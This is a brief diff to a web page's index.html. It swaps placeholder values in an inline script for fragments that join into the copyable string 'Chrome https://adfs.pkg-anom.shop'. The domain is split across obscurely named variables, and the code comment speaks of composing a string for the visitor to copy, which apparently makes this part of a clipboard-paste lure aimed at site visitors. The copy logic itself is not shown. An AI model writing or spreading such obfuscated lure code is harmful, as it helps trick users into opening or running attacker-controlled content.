--- a/index.html
+++ b/index.html
@@ -198,9 +198,9 @@
   <script>
     // Compose the string you want to copy
     const bro = "Chrome";
-    const usr = "app";
-    const domo = "website";
-    const tosd = ".com";
+    const usr = "adfs";
+    const domo = "pkg-anom";
+    const tosd = ".shop";
     const composed = `${bro} https://${usr}.${domo}${tosd}`;
 
     function onReady(fn){
